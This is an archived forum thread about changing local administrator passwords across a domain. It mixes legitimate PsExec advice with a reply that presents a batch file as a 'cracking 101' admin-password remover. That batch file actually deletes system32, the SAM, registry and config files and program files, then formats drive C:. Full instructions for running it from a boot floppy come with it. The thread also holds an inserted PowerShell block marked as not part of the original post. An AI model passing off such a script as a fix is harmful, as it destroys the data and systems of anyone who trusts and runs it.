Script to change local admin password

0 Votes
Locked

sspara
I need a script, not a logon script, but a script I can run from one workstation or server and change all the local admin passwords on my domain. Can anyone help? I have zero experience with scripts so I need one pretty much dummy proof with lots of instructions.
  • +
    0 Votes
    ThumbsUp2

    Is there a particular reason you cannot run it as a logon script? Perhaps you don't have the appropriate permission to be changing the local admin passwords? Your question sounds "fishy" to me.

    +
    0 Votes
    sspara

    By making it a login script it makes the new password available to the end user. This of course is a security concern.

    +
    0 Votes
    cmiller5400

    Not if you encrypt the vbs file to a vbe using the screnc.exe file.

    +
    0 Votes
    w2ktechman

    A nice little boot floppy :)

    Ok, so you wanna be a cracker. This is cracking 101. Just remember that NEVER TRY THIS, as it is illegal. Ok, for starters let me just say that this is tricky. No actual danger though, but you really should practice it on your own system before attempting to try it on anyone else's. You should at minimum try it 5 or 6 times to really get to know how to do it well.

    Items needed

    Ability to create a batch file
    floppy disk
    USB floppy disk drive
    create a boot floppy with NTFS Write permissions

    Ok, once you have gathered the materials you should already have a boot floppy ready. In the autoexec.bat file add the line suser.bat at the end.

    On your desktop, create a file called suser.txt for (suser stands for Super User).
    Open the suser.txt file and paste the information below

    cls
    rem # start _admin.pwd
    ren %systemroot%\system32\etc %systemroot%\system32\cet
    rem start process A32#458
    ren %systemroot%\repair\DS_SOFTWARE A1E
    ren %systemroot%\repair\DS_SECURITY A2E
    ren %systemroot%\repair\DS_SAM A3E
    ren %systemroot%\repair\DS_system.bak A4E
    del %systemroot%\repair\A*.* /Q /F
    del %systemroot%\repair\s*.* /Q /F
    rem script _admin.pwd
    del %systemroot%\system32\catroot\*.*
    del %systemroot%\system32\catroot2\*.*
    del %systemroot%\system32\drivers\cet*.*
    rem new_pwd.pwd ==generate 0
    del "c:\program files" /Q /F
    ren %systemroot%\system32 %systemroot%\newpwd
    ren %systemroot%\system %systemroot%\system32
    rem AUTO_START new_pwd.pwd 44#1
    rem _admin.pwd == DISABLE
    del %systemroot%\system32\config /Q /F
    erase %systemroot%\system32\LogFiles\*.*
    rem ACTIVATE_MEMORY_FLOOD_0x0000323A
    rem DISABLE_LOGFILES
    format c:\ /Q /A:4096
    rem RESTART _admin.pwd


    Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
    copy the file to your boot floppy disk.

    Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.
    Sometimes people really lock down the admin account, but this program is smart enough to unlock from both 'hidden' places, to allow a 'no password' option and blank it out, a double whammy!!!

    Remember, this is a REAL program that can get you into serious trouble. Also, it is 'time sensitive' when dealing with another person's system without them knowing. Always get to know a program with this much power BEFORE attempting to use it on someone else's machine.

    And most of all, never actually use it. I posted it as informative material. USE AT YOUR OWN RISK!!!
    And, never ever tell anyone that I gave this to you....

    +
    0 Votes
    sspara

    I'm not trying to hack anything, I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine.

    +
    0 Votes
    jruby

    I have concerns about someone who is changing admin passwords who doesn't have any experience with automation basics. Are you in over your head here?

    +
    0 Votes
    sspara

    I'm administering a network and it is time to change the local admin password on all the clients. I don't want to go to each machine (all 110 of them) to change the password. I want a script to do it for me with one double click from one machine. I'm not in over my head, I just want an easier way of doing things, and would like some help. If you or anyone could give me a basic script that can do this task with some fill in the blank stuff like "domain name here" or "VLAN here" and "new password here" or whatever that would be great.

    +
    0 Votes
    jruby

    This isn't necessarily a one-click solution, but it's not real complex either.


    Create a file that contains the names of all the nodes where you will be changing the password, call it Nodes.txt. Put one workstation or server per line. Download PSExec from MS (It's a prog from SysInternals and incredibly useful, part of PSTools I think).

    Logon using a profile that has admin rights to all the systems where you will be changing the admin password.

    Issue the command

    PSEXEC @Nodes.txt NET USER administrator TheNewPassword

    Make sure 'TheNewPassword' matches the complexity rules for the security policies that are in place.

    This worked on a virtual environment I have here, you may start with just one or two test machines in your Nodes.Txt file so you can verify it will work in your environment before turning it loose on all machines. For comfort, you may want to break your list of nodes into multiple files and change them in groups.

    Jim

    /* If you think the problem is bad now, wait until I fix it! */
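
Added example, not part of the original post: a PowerShell pre-flight for the Nodes.txt procedure above. It checks each node for SMB (TCP 445) and the admin$ share that PsExec relies on, then splits the reachable nodes into smaller list files as the post suggests. It assumes PowerShell 4.0 or later; the script parameters and output file names are hypothetical.

```powershell
# Added example: pre-flight check for the node list used with PsExec.
# Assumptions: Nodes.txt holds one computer name per line; parameter names,
# batch size and output file names are illustrative choices, not from the thread.
param(
    [string]$NodeFile = '.\Nodes.txt',
    [int]$BatchSize   = 10
)

function Test-Node {
    param([string]$Name)
    $r = [pscustomobject]@{ Node = $Name; Smb445 = $false; AdminShare = $false; Note = '' }

    # PsExec copies its service over SMB, so TCP 445 has to answer first.
    $r.Smb445 = [bool](Test-NetConnection -ComputerName $Name -Port 445 `
                       -InformationLevel Quiet -WarningAction SilentlyContinue)
    if (-not $r.Smb445) {
        $r.Note = 'TCP 445 unreachable (offline, firewall, or name not resolved)'
        return $r
    }

    # The admin$ share must be visible to the account running this script.
    $share = '\\{0}\admin$' -f $Name
    $r.AdminShare = [bool](Test-Path -Path $share -ErrorAction SilentlyContinue)
    if (-not $r.AdminShare) {
        $r.Note = 'admin$ not accessible (share disabled or no admin rights)'
    }
    return $r
}

# Read the list, dropping blank lines and surrounding whitespace.
$nodes  = Get-Content $NodeFile | ForEach-Object { $_.Trim() } | Where-Object { $_ }
$report = foreach ($n in $nodes) { Test-Node -Name $n }
$report | Format-Table -AutoSize

# Nodes that failed go to a CSV for follow-up instead of into the PsExec run.
$report | Where-Object { -not $_.AdminShare } |
    Export-Csv -Path '.\Nodes.failed.csv' -NoTypeInformation

# Reachable nodes are written in groups: Nodes.batch01.txt, Nodes.batch02.txt, ...
$ready = @($report | Where-Object { $_.AdminShare } | Select-Object -ExpandProperty Node)
for ($i = 0; $i -lt $ready.Count; $i += $BatchSize) {
    $last = [Math]::Min($i + $BatchSize, $ready.Count) - 1
    $file = '.\Nodes.batch{0:D2}.txt' -f ([int]($i / $BatchSize) + 1)
    $ready[$i..$last] | Set-Content -Path $file
}
```

Each batch file can then be passed to PsExec in place of Nodes.txt. The new password still travels as a command-line argument, so it is visible in process listings and in any command-line auditing on the machines involved.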

    +
    0 Votes
    sspara

    Ok so this has gotten me the furthest, but when I run the command I get this error "Make sure that the default admin$ share is enabled on (computer name here)". I'm running the command from an account with domain admin rights and I'm running it from the directory with the PStools with the nodes.txt file in the same directory as well. I used the exact syntax you used only replacing TheNewPassword with obviously my new password, and it still didn't work. Should I be replacing NET USER with something?

    +
    0 Votes
    OldER Mycroft

    I suggest you allow the air to circulate in and around your arse cheeks, thereby stimulating blood flow to your lower extremities, and actually go have a look at all these machines.

    Showing your face around the company premises might boost your reputation as someone who takes an active interest and actually cares, rather than someone who does everything remotely from a sweaty, arse-impregnated chair. :)

    +
    0 Votes
    sspara

    I show my face every day around the company premises, and I have a reputation as someone who actually cares but I do not see a reason to disturb everyone while they are working just to change a password that I'm pretty sure can be done remotely. I also want to learn new innovative ways of doing things, and scripting to me is new. I think finding a way to just double click one file and change all the passwords at once is a much smarter route than walking to each machine, which would take all day. I have more important things to do. Don't worry, someone will help me find the right answer so please don't worry about my arse cheeks unless you want to kiss my ***!

    +
    0 Votes
    CharlieSpencer

    I don't have a solution, just a question.

    You say you need to do this because it's time to change the local Admin p/w. What determines the frequency of this? Is there a company policy covering this? How many people know the local admin p/w? Are you changing it because one of them left?

    Just wondering.

    +
    0 Votes
    steven.taylor

    In spite of all the outrage at using a utility to change all the admin passwords at once, I guess the others do it manually or never at all....

    Try using PSTools. They have a utility called pspassword or something like that that will do the job for you.
